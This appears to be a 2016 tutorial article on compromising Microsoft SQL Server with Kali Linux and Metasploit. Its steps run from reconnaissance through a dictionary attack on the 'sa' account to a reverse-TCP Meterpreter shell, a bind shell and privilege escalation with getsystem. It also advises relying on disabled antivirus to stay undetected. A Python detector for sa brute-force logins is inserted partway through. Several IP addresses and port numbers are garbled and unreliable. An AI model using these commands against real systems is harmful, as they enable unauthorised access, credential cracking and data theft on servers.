Whether this is done to keep troubleshooting simple for support staff or it is simply a matter of underestimating the risks, it doesn't really matter. What matters is that this makes it very easy for an attacker to get full access to the system. In this attack, we will use a standard install of Kali Linux and the preinstalled Metasploit framework. The target is a Windows XP machine running Microsoft SQL Server 2. The same attack will work on any MS SQL platform and Windows OS, because the weakness in the system here is the password strength, not the environment itself.

## Reconnaissance

As in any attack, we will first need to gather intelligence on our target system. One option is to use tools like Nmap to scan a certain IP range for standard SQL ports.

Command:

```
nmap -sT -A -P0 1. 92. 1.
```

Another option is the Metasploit mssql_ping scanner, which will identify any Microsoft SQL Server in a specific IP range.

Commands:

```
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS 1.        (IP range)
set THREADS 8
run
```

Now that we have our target system (1., Microsoft SQL Server 2. SP4, TCP port 1. 43.), the attack can begin.

## Attack

This attack is based on a simple principle. In most cases Microsoft SQL Server will be installed as a mixed-mode instance. The default user for this is "sa". Very often a simple password is used for this user, which means it will be relatively easy to brute-force the password using a dictionary file. These dictionary files can be downloaded or generated.
The benefit of generating a customized list is that some tools allow the manual addition of specific terms, such as the software name or vendor, that could have been used by the application installer. That would cover, for instance, a password like "Sandstone" on the SQL instance running the databases for the application "Sandstone". For the attack we will use the built-in module mssql_login. After specifying the target and a password file, the dictionary attack will begin.

Commands:

```
use auxiliary/scanner/mssql/mssql_login
set PASS_FILE /root/passwords.
set RHOSTS 1. 92.
set THREADS 8
set VERBOSE false
run
```

If this step of the attack is successful, the SA password will be found. This by itself can be a valuable piece of information that allows manipulation of the databases. In this attack, however, we will use the SA account to gain access to the underlying Windows operating system.

## Exploitation

We can now use the SA password we obtained to set up a connection to our target. Kali Linux has a built-in module named mssql_payload. This module will allow us to send a payload through port 1. We will use this payload to set up a session between the target and our attacking system.

Commands:

```
use exploit/windows/mssql/mssql_payload
set RHOST 1.
set PASSWORD Password01                     (which we have just cracked)
set PAYLOAD windows/meterpreter/reverse_tcp (our selected payload)
exploit
```

Now the fun starts. A session has been opened to our target, and from here we have many commands at our disposal. Keep in mind, however, that many antivirus programs will detect, block, and remove the Meterpreter files when they are installed on a target system. From experience, however, I can say that many SQL Server administrators disable any form of on-access scanning to get the most performance out of the databases hosted by the server. If the target only runs, for instance, an overnight virus scan, that leaves plenty of time to attack, gather the data from the system, and then leave undetected.
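The dictionary attack against "sa" and the follow-up login with the cracked password both leave a trail in the SQL Server errorlog. As an added defensive example (not part of the original article), the Python below parses the errorlog "Logon" lines and flags a client that racks up repeated failed "sa" logins inside a short window, escalating the verdict to "cracked" when a successful "sa" login from the same client follows. The log excerpt is constructed; it assumes the server's login auditing records successful logins as well as failures, otherwise only the "bruteforce" verdict is reachable.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed SQL Server errorlog excerpt (sample data, not from the page).
# The line shapes follow the errorlog "Login failed"/"Login succeeded" messages;
# success lines are only written when login auditing includes successful logins.
SAMPLE_LOG = """\
2016-09-14 10:15:02.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2016-09-14 10:15:02.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2016-09-14 10:15:02.50 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2016-09-14 10:15:02.68 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2016-09-14 10:15:02.87 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
2016-09-14 10:15:04.05 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]
2016-09-14 10:20:00.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.55]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]$"
)

def parse_logon_events(log):
    """Yield (timestamp, result, user, client) for each matching Logon line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["result"], m["user"], m["client"]

def detect_sa_dictionary_attack(log, threshold=5, window=timedelta(minutes=5)):
    """Return {client: verdict}: 'bruteforce' once a client logs `threshold` failed
    'sa' logins inside `window`, 'cracked' if a successful 'sa' login then follows."""
    recent_failures = defaultdict(list)
    verdicts = {}
    for ts, result, user, client in parse_logon_events(log):
        if user != "sa":
            continue  # only the sa account is in scope for this detection
        if result == "failed":
            hits = [t for t in recent_failures[client] if ts - t <= window] + [ts]
            recent_failures[client] = hits
            if len(hits) >= threshold:
                verdicts.setdefault(client, "bruteforce")
        elif client in verdicts:
            verdicts[client] = "cracked"
    return verdicts

if __name__ == "__main__":
    print(detect_sa_dictionary_attack(SAMPLE_LOG))  # {'192.0.2.10': 'cracked'}
```

A single failed "sa" login from another client (the appuser line, or an admin typo) never trips the threshold, which keeps the alert tied to the dictionary pattern rather than to every failed login.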
Instead of the Meterpreter payload, other payloads can be used as well. This is just a matter of running the same commands as above but changing the name of the payload. The payload "generic/shell_bind_tcp", for instance, will give command prompt access to the target system.

## Privilege Escalation

For many of these commands we will need to increase our user access level. Tools to create screenshots and keyloggers, and tools to extract password hashes, will need to run with administrative privileges. This is made quite easy with the Meterpreter shell. First, we generate a list of running processes with the "ps" command. We can then use the "migrate" command to migrate to a process with a higher level of system access; in this case that will be explorer. There is one extra command we need to use: getsystem. This gives the Meterpreter session SYSTEM access, which is required by the migrate command.
September 2016